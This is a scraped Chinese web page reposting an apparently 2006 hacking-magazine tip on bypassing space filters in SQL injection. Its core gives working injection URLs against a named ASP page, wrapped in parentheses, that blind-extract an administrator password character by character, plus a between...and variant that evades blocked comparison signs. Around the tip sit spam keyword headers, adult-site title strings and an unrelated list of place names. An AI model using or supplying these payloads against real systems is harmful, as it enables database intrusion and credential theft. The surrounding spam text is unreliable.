婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 突破空格的限制

突破空格的限制

熱門標簽:客服外呼系統呼叫中心 保定電銷機器人軟件 土地證宗地圖標注符號 電話機器人案例 鎮江云外呼系統怎么樣 成都銷售外呼系統公司 vue 地圖標注拖拽 自動外呼系統怎么防止封卡 電話機器人銷售公司嗎
關于空格,有許多替換方式,比如TAB空格,SQL數據庫中的/**/,但我又找到了另一種替換方式,已發表于《黑客手冊》2006.7期中,這里挑其精華,現一下吧!

對于SQL語句,大家還都習慣于其的空格,比如select id from [name],如果中間沒有了空格,那就成了selectidfrom[name], 一灘糊涂!除了上面所說到幾個空格的替代方法外,我發現用()括號在SQL中一樣可以運行,比如上面的語句,就可以寫成,select(id)from[name],有括號分隔,可以正常執行。
舉個例 子說一下,我們得到一個注入點:jmdcw.asp?name=aa'and 1=1 and ''=',如果替換其中的1=1為查詢管理員的密碼的語句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其實可以寫成這樣的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了和>符號,則用between…and…,語句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

對于中間應該出現空格的地方,用()進行替換,不過,對于很復雜的SQL語句就不太好用了。上面說到的是字符型的,如果是數值型,可以在id=1后加一個括號,不過這個我沒有測試,比如:jmdcw.asp?id=(1)and(select.....),應該是可行的吧?

呵呵,總結一下,和LOVESHELL上的朋友分享一下。 

標簽:內江 懷化 成都 重慶 天津 麗江 臺灣 公主嶺

巨人網絡通訊聲明:本文標題《突破空格的限制》,本文關鍵詞  突破,空格,的,限制,突破,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《突破空格的限制》相關的同類信息!
  • 本頁收集關于突破空格的限制的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 道真| 梓潼县| 南岸区| 玛曲县| 林周县| 潼南县| 合作市| 岑巩县| 明水县| 浙江省| 县级市| 桦甸市| 大宁县| 内黄县| 定西市| 临城县| 保山市| 长汀县| 旅游| 凤台县| 蓝山县| 徐水县| 镇平县| 新郑市| 临泽县| 桐庐县| 丽水市| 武夷山市| 泸定县| 金塔县| 临沭县| 宝丰县| 湟中县| 福鼎市| 青神县| 建平县| 洛南县| 井冈山市| 册亨县| 攀枝花市| 嘉义市|